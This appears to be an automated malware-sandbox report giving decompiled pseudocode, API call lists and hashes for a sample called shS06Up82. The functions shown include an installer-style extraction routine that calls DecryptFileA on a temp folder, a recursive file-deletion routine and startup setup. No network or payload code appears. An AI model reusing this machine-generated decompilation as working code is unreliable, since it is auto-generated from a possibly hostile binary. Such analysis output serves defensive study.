                                                                                                                                                                                                      				_t43 = __edx;
                                                                                                                                                                                                      				_t9 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                      				if( *0x3e8a38 != 0) {
                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                      					_t11 = E003E5164(_t52);
                                                                                                                                                                                                      					_t53 = _t11;
                                                                                                                                                                                                      					if(_t11 == 0) {
                                                                                                                                                                                                      						L16:
                                                                                                                                                                                                      						_t12 = 0;
                                                                                                                                                                                                      						L17:
                                                                                                                                                                                                      						return E003E6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t14 = E003E55A0(_t53); // executed
                                                                                                                                                                                                      					if(_t14 == 0) {
                                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t45 = 0x105;
                                                                                                                                                                                                      						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                      						_t43 = 0x105;
                                                                                                                                                                                                      						_t40 =  &_v272;
                                                                                                                                                                                                      						E003E658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                      						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                      						_t44 = 0;
                                                                                                                                                                                                      						if(_t36 != 0) {
                                                                                                                                                                                                      							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                      							_v276 = _t31;
                                                                                                                                                                                                      							if(_t31 != 0) {
                                                                                                                                                                                                      								_t45 = _t47;
                                                                                                                                                                                                      								_t40 = _t31;
                                                                                                                                                                                                      								 *0x3ea288("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\", 0); // executed
                                                                                                                                                                                                      								_v276();
                                                                                                                                                                                                      								if(_t47 != _t47) {
                                                                                                                                                                                                      									_t40 = 4;
                                                                                                                                                                                                      									asm("int 0x29");
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						FreeLibrary(_t36);
                                                                                                                                                                                                      						_t58 =  *0x3e8a24 - _t44; // 0x0
                                                                                                                                                                                                      						if(_t58 != 0) {
                                                                                                                                                                                                      							L14:
                                                                                                                                                                                                      							_t21 = SetCurrentDirectoryA("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\"); // executed
                                                                                                                                                                                                      							if(_t21 != 0) {
                                                                                                                                                                                                      								__eflags =  *0x3e8a2c - _t44; // 0x0
                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                      									L20:
                                                                                                                                                                                                      									__eflags =  *0x3e8d48 & 0x000000c0;
                                                                                                                                                                                                      									if(( *0x3e8d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                      										_t41 =  *0x3e9a40; // 0x3, executed
                                                                                                                                                                                                      										_t26 = E003E256D(_t41); // executed
                                                                                                                                                                                                      										_t44 = _t26;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t22 =  *0x3e8a24; // 0x0
                                                                                                                                                                                                      									 *0x3e9a44 = _t44;
                                                                                                                                                                                                      									__eflags = _t22;
                                                                                                                                                                                                      									if(_t22 != 0) {
                                                                                                                                                                                                      										L26:
                                                                                                                                                                                                      										__eflags =  *0x3e8a38;
                                                                                                                                                                                                      										if( *0x3e8a38 == 0) {
                                                                                                                                                                                                      											__eflags = _t22;
                                                                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                                                                      												E003E4169(__eflags);
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t12 = 1;
                                                                                                                                                                                                      										goto L17;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										__eflags =  *0x3e9a30 - _t22; // 0x0
                                                                                                                                                                                                      										if(__eflags != 0) {
                                                                                                                                                                                                      											goto L26;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t25 = E003E3BA2(); // executed
                                                                                                                                                                                                      										__eflags = _t25;
                                                                                                                                                                                                      										if(_t25 == 0) {
                                                                                                                                                                                                      											goto L16;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t22 =  *0x3e8a24; // 0x0
                                                                                                                                                                                                      										goto L26;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t27 = E003E3B26(_t40, _t44);
                                                                                                                                                                                                      								__eflags = _t27;
                                                                                                                                                                                                      								if(_t27 == 0) {
                                                                                                                                                                                                      									goto L16;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t43 = 0x4bc;
                                                                                                                                                                                                      							E003E44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                      							 *0x3e9124 = E003E6285();
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t59 =  *0x3e9a30 - _t44; // 0x0
                                                                                                                                                                                                      						if(_t59 != 0) {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t30 = E003E621E(); // executed
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L14;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t49 =  *0x3e8a24;
                                                                                                                                                                                                      				if( *0x3e8a24 != 0) {
                                                                                                                                                                                                      					L4:
                                                                                                                                                                                                      					_t34 = E003E3A3F(_t51);
                                                                                                                                                                                                      					_t52 = _t34;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L5;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(E003E51E5(_t49) == 0) {
                                                                                                                                                                                                      					goto L16;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t51 =  *0x3e8a38;
                                                                                                                                                                                                      				if( *0x3e8a38 != 0) {
                                                                                                                                                                                                      					goto L5;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L4;
                                                                                                                                                                                                      			}




























                                                                                                                                                                                                      0x003e2f1d
                                                                                                                                                                                                      0x003e2f28
                                                                                                                                                                                                      0x003e2f2f
                                                                                                                                                                                                      0x003e2f3d
                                                                                                                                                                                                      0x003e2f6c
                                                                                                                                                                                                      0x003e2f6c
                                                                                                                                                                                                      0x003e2f71
                                                                                                                                                                                                      0x003e2f73
                                                                                                                                                                                                      0x003e3041
                                                                                                                                                                                                      0x003e3041
                                                                                                                                                                                                      0x003e3043
                                                                                                                                                                                                      0x003e3053
                                                                                                                                                                                                      0x003e3053
                                                                                                                                                                                                      0x003e2f79
                                                                                                                                                                                                      0x003e2f80
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2f86
                                                                                                                                                                                                      0x003e2f86
                                                                                                                                                                                                      0x003e2f93
                                                                                                                                                                                                      0x003e2f9e
                                                                                                                                                                                                      0x003e2fa0
                                                                                                                                                                                                      0x003e2fa6
                                                                                                                                                                                                      0x003e2fb8
                                                                                                                                                                                                      0x003e2fba
                                                                                                                                                                                                      0x003e2fbe
                                                                                                                                                                                                      0x003e2fc6
                                                                                                                                                                                                      0x003e2fcc
                                                                                                                                                                                                      0x003e2fd4
                                                                                                                                                                                                      0x003e2fd6
                                                                                                                                                                                                      0x003e2fd8
                                                                                                                                                                                                      0x003e2fe0
                                                                                                                                                                                                      0x003e2fe6
                                                                                                                                                                                                      0x003e2fee
                                                                                                                                                                                                      0x003e2ff0
                                                                                                                                                                                                      0x003e2ff5
                                                                                                                                                                                                      0x003e2ff5
                                                                                                                                                                                                      0x003e2fee
                                                                                                                                                                                                      0x003e2fd4
                                                                                                                                                                                                      0x003e2ff8
                                                                                                                                                                                                      0x003e2ffe
                                                                                                                                                                                                      0x003e3004
                                                                                                                                                                                                      0x003e3017
                                                                                                                                                                                                      0x003e301c
                                                                                                                                                                                                      0x003e3024
                                                                                                                                                                                                      0x003e3054
                                                                                                                                                                                                      0x003e305a
                                                                                                                                                                                                      0x003e3065
                                                                                                                                                                                                      0x003e3065
                                                                                                                                                                                                      0x003e306c
                                                                                                                                                                                                      0x003e306e
                                                                                                                                                                                                      0x003e3075
                                                                                                                                                                                                      0x003e307a
                                                                                                                                                                                                      0x003e307a
                                                                                                                                                                                                      0x003e307c
                                                                                                                                                                                                      0x003e3081
                                                                                                                                                                                                      0x003e3087
                                                                                                                                                                                                      0x003e3089
                                                                                                                                                                                                      0x003e30a1
                                                                                                                                                                                                      0x003e30a1
                                                                                                                                                                                                      0x003e30a9
                                                                                                                                                                                                      0x003e30ab
                                                                                                                                                                                                      0x003e30ad
                                                                                                                                                                                                      0x003e30af
                                                                                                                                                                                                      0x003e30af
                                                                                                                                                                                                      0x003e30ad
                                                                                                                                                                                                      0x003e30b6
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e308b
                                                                                                                                                                                                      0x003e308b
                                                                                                                                                                                                      0x003e3091
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3093
                                                                                                                                                                                                      0x003e3098
                                                                                                                                                                                                      0x003e309a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e309c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e309c
                                                                                                                                                                                                      0x003e3089
                                                                                                                                                                                                      0x003e305c
                                                                                                                                                                                                      0x003e3061
                                                                                                                                                                                                      0x003e3063
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3063
                                                                                                                                                                                                      0x003e302b
                                                                                                                                                                                                      0x003e3032
                                                                                                                                                                                                      0x003e303c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e303c
                                                                                                                                                                                                      0x003e3006
                                                                                                                                                                                                      0x003e300c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e300e
                                                                                                                                                                                                      0x003e3015
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3015
                                                                                                                                                                                                      0x003e2f80
                                                                                                                                                                                                      0x003e2f3f
                                                                                                                                                                                                      0x003e2f46
                                                                                                                                                                                                      0x003e2f5f
                                                                                                                                                                                                      0x003e2f5f
                                                                                                                                                                                                      0x003e2f64
                                                                                                                                                                                                      0x003e2f66
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2f66
                                                                                                                                                                                                      0x003e2f4f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2f55
                                                                                                                                                                                                      0x003e2f5d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 003E2F93
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 003E2FB2
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 003E2FC6
                                                                                                                                                                                                      • DecryptFileA.ADVAPI32 ref: 003E2FE6
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 003E2FF8
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 003E301C
                                                                                                                                                                                                        • Part of subcall function 003E51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,003E2F4D,?,00000002,00000000), ref: 003E5201
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                      • API String ID: 2126469477-1274120739
                                                                                                                                                                                                      • Opcode ID: 1d5d806df4ecdc413009a03659113679710f93e969223f888e09e4a61a17eab4
                                                                                                                                                                                                      • Instruction ID: 2e27227ac5350b4b53a061d1143bf75e72c9754f211a917c9f857d341be4423e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d5d806df4ecdc413009a03659113679710f93e969223f888e09e4a61a17eab4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7741B030A002F59ADB33AB339D8976A37AC9B54750F01077AE906DB1D1EB74DE80CA61
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                      			E003E2390(CHAR* __ecx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				char _v280;
                                                                                                                                                                                                      				char _v284;
                                                                                                                                                                                                      				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                      				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t21;
                                                                                                                                                                                                      				int _t36;
                                                                                                                                                                                                      				void* _t46;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				void* _t63;
                                                                                                                                                                                                      				CHAR* _t65;
                                                                                                                                                                                                      				void* _t66;
                                                                                                                                                                                                      				signed int _t67;
                                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                      				_t21 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                      				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                      				_t65 = __ecx;
                                                                                                                                                                                                      				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                      					L10:
                                                                                                                                                                                                      					_pop(_t62);
                                                                                                                                                                                                      					_pop(_t66);
                                                                                                                                                                                                      					_pop(_t46);
                                                                                                                                                                                                      					return E003E6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E003E1680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                      					_t58 = 0x104;
                                                                                                                                                                                                      					E003E16B3( &_v280, 0x104, "*");
                                                                                                                                                                                                      					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                      					_t63 = _t22;
                                                                                                                                                                                                      					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						goto L3;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						L3:
                                                                                                                                                                                                      						_t58 = 0x104;
                                                                                                                                                                                                      						E003E1680( &_v276, 0x104, _t65);
                                                                                                                                                                                                      						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                      							_t58 = 0x104;
                                                                                                                                                                                                      							E003E16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                      							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                      							DeleteFileA( &_v280);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                      								E003E16B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                      								_t58 = 0x104;
                                                                                                                                                                                                      								E003E658A( &_v280, 0x104, 0x3e1140);
                                                                                                                                                                                                      								E003E2390( &_v284);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                      					} while (_t36 != 0);
                                                                                                                                                                                                      					FindClose(_t63); // executed
                                                                                                                                                                                                      					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}





















                                                                                                                                                                                                      0x003e2398
                                                                                                                                                                                                      0x003e239e
                                                                                                                                                                                                      0x003e23a3
                                                                                                                                                                                                      0x003e23a5
                                                                                                                                                                                                      0x003e23ae
                                                                                                                                                                                                      0x003e23b3
                                                                                                                                                                                                      0x003e24cb
                                                                                                                                                                                                      0x003e24d2
                                                                                                                                                                                                      0x003e24d3
                                                                                                                                                                                                      0x003e24d4
                                                                                                                                                                                                      0x003e24df
                                                                                                                                                                                                      0x003e23c2
                                                                                                                                                                                                      0x003e23d1
                                                                                                                                                                                                      0x003e23db
                                                                                                                                                                                                      0x003e23e4
                                                                                                                                                                                                      0x003e23f6
                                                                                                                                                                                                      0x003e23fc
                                                                                                                                                                                                      0x003e2401
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2407
                                                                                                                                                                                                      0x003e2407
                                                                                                                                                                                                      0x003e2408
                                                                                                                                                                                                      0x003e2411
                                                                                                                                                                                                      0x003e241f
                                                                                                                                                                                                      0x003e247a
                                                                                                                                                                                                      0x003e2483
                                                                                                                                                                                                      0x003e2495
                                                                                                                                                                                                      0x003e24a3
                                                                                                                                                                                                      0x003e2421
                                                                                                                                                                                                      0x003e242f
                                                                                                                                                                                                      0x003e2453
                                                                                                                                                                                                      0x003e245d
                                                                                                                                                                                                      0x003e2466
                                                                                                                                                                                                      0x003e2472
                                                                                                                                                                                                      0x003e2472
                                                                                                                                                                                                      0x003e242f
                                                                                                                                                                                                      0x003e24af
                                                                                                                                                                                                      0x003e24b5
                                                                                                                                                                                                      0x003e24be
                                                                                                                                                                                                      0x003e24c5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e24c5

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindFirstFileA.KERNELBASE(?,003E8A3A,003E11F4,003E8A3A,00000000,?,?), ref: 003E23F6
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(?,003E11F8), ref: 003E2427
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(?,003E11FC), ref: 003E243B
                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 003E2495
                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 003E24A3
                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(00000000,00000010), ref: 003E24AF
                                                                                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 003E24BE
                                                                                                                                                                                                      • RemoveDirectoryA.KERNELBASE(003E8A3A), ref: 003E24C5
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 836429354-0
                                                                                                                                                                                                      • Opcode ID: 3be5b88ee457eb0ba71edbbe2fed946b2b3c190d6a4fbe44141fdf8b6b0152f1
                                                                                                                                                                                                      • Instruction ID: 9afee27320b18ec8dcf59e1f589c192dd4d30e275a6239c79c33b40bb3166a36
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3be5b88ee457eb0ba71edbbe2fed946b2b3c190d6a4fbe44141fdf8b6b0152f1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A3174316046D09BD332DB66CC8AEEB73ACAFC4315F044B2DF5558A2D0EB74A9098B52
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 70%
                                                                                                                                                                                                      			E003E2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                                      				long _t4;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				intOrPtr _t7;
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				struct HINSTANCE__* _t12;
                                                                                                                                                                                                      				intOrPtr* _t17;
                                                                                                                                                                                                      				signed char _t19;
                                                                                                                                                                                                      				intOrPtr* _t21;
                                                                                                                                                                                                      				void* _t22;
                                                                                                                                                                                                      				void* _t24;
                                                                                                                                                                                                      				intOrPtr _t32;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t4 = GetVersion();
                                                                                                                                                                                                      				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                      					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                      					if(_t12 != 0) {
                                                                                                                                                                                                      						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                      						if(_t21 != 0) {
                                                                                                                                                                                                      							_t17 = _t21;
                                                                                                                                                                                                      							 *0x3ea288(0, 1, 0, 0);
                                                                                                                                                                                                      							 *_t21();
                                                                                                                                                                                                      							_t29 = _t24 - _t24;
                                                                                                                                                                                                      							if(_t24 != _t24) {
                                                                                                                                                                                                      								_t17 = 4;
                                                                                                                                                                                                      								asm("int 0x29");
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t20 = _a12;
                                                                                                                                                                                                      				_t18 = _a4;
                                                                                                                                                                                                      				 *0x3e9124 = 0;
                                                                                                                                                                                                      				if(E003E2CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                      					_t9 = E003E2F1D(_t18, _t20); // executed
                                                                                                                                                                                                      					_t22 = _t9; // executed
                                                                                                                                                                                                      					E003E52B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                      					if(_t22 != 0) {
                                                                                                                                                                                                      						_t32 =  *0x3e8a3a; // 0x0
                                                                                                                                                                                                      						if(_t32 == 0) {
                                                                                                                                                                                                      							_t19 =  *0x3e9a2c; // 0x0
                                                                                                                                                                                                      							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                      								E003E1F90(_t19, _t21, _t22);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t6 =  *0x3e8588; // 0x0
                                                                                                                                                                                                      				if(_t6 != 0) {
                                                                                                                                                                                                      					CloseHandle(_t6);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t7 =  *0x3e9124; // 0x80070002
                                                                                                                                                                                                      				return _t7;
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      0x003e2c03
                                                                                                                                                                                                      0x003e2c0d
                                                                                                                                                                                                      0x003e2c18
                                                                                                                                                                                                      0x003e2c20
                                                                                                                                                                                                      0x003e2c2e
                                                                                                                                                                                                      0x003e2c32
                                                                                                                                                                                                      0x003e2c36
                                                                                                                                                                                                      0x003e2c3d
                                                                                                                                                                                                      0x003e2c43
                                                                                                                                                                                                      0x003e2c45
                                                                                                                                                                                                      0x003e2c47
                                                                                                                                                                                                      0x003e2c49
                                                                                                                                                                                                      0x003e2c4e
                                                                                                                                                                                                      0x003e2c4e
                                                                                                                                                                                                      0x003e2c47
                                                                                                                                                                                                      0x003e2c32
                                                                                                                                                                                                      0x003e2c20
                                                                                                                                                                                                      0x003e2c50
                                                                                                                                                                                                      0x003e2c54
                                                                                                                                                                                                      0x003e2c57
                                                                                                                                                                                                      0x003e2c64
                                                                                                                                                                                                      0x003e2c66
                                                                                                                                                                                                      0x003e2c6b
                                                                                                                                                                                                      0x003e2c6d
                                                                                                                                                                                                      0x003e2c74
                                                                                                                                                                                                      0x003e2c76
                                                                                                                                                                                                      0x003e2c7c
                                                                                                                                                                                                      0x003e2c7e
                                                                                                                                                                                                      0x003e2c87
                                                                                                                                                                                                      0x003e2c89
                                                                                                                                                                                                      0x003e2c89
                                                                                                                                                                                                      0x003e2c87
                                                                                                                                                                                                      0x003e2c7c
                                                                                                                                                                                                      0x003e2c74
                                                                                                                                                                                                      0x003e2c8e
                                                                                                                                                                                                      0x003e2c95
                                                                                                                                                                                                      0x003e2c98
                                                                                                                                                                                                      0x003e2c98
                                                                                                                                                                                                      0x003e2c9e
                                                                                                                                                                                                      0x003e2ca7

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetVersion.KERNEL32(?,00000002,00000000,?,003E6BB0,003E0000,00000000,00000002,0000000A), ref: 003E2C03
                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,?,003E6BB0,003E0000,00000000,00000002,0000000A), ref: 003E2C18
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 003E2C28
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,003E6BB0,003E0000,00000000,00000002,0000000A), ref: 003E2C98
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                      • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                      • API String ID: 62482547-3460614246
                                                                                                                                                                                                      • Opcode ID: eb03d823a30a099404c6a6741cdc1b42db41819bbe52acedb054eec737daf81c
                                                                                                                                                                                                      • Instruction ID: 337d524b721fe9eaa3650803c0ff281236dad8c2fe1a1b3605dd3b3d343966db
                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb03d823a30a099404c6a6741cdc1b42db41819bbe52acedb054eec737daf81c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B11E0316006E59BCB336BB7ECC8AAF375D9B84380F260725F904EB2D0CA30EC018661
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E6F40() {
                                                                                                                                                                                                      
                                                                                                                                                                                                      				SetUnhandledExceptionFilter(E003E6EF0); // executed
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}



                                                                                                                                                                                                      0x003e6f45
                                                                                                                                                                                                      0x003e6f4d

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 003E6F45
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
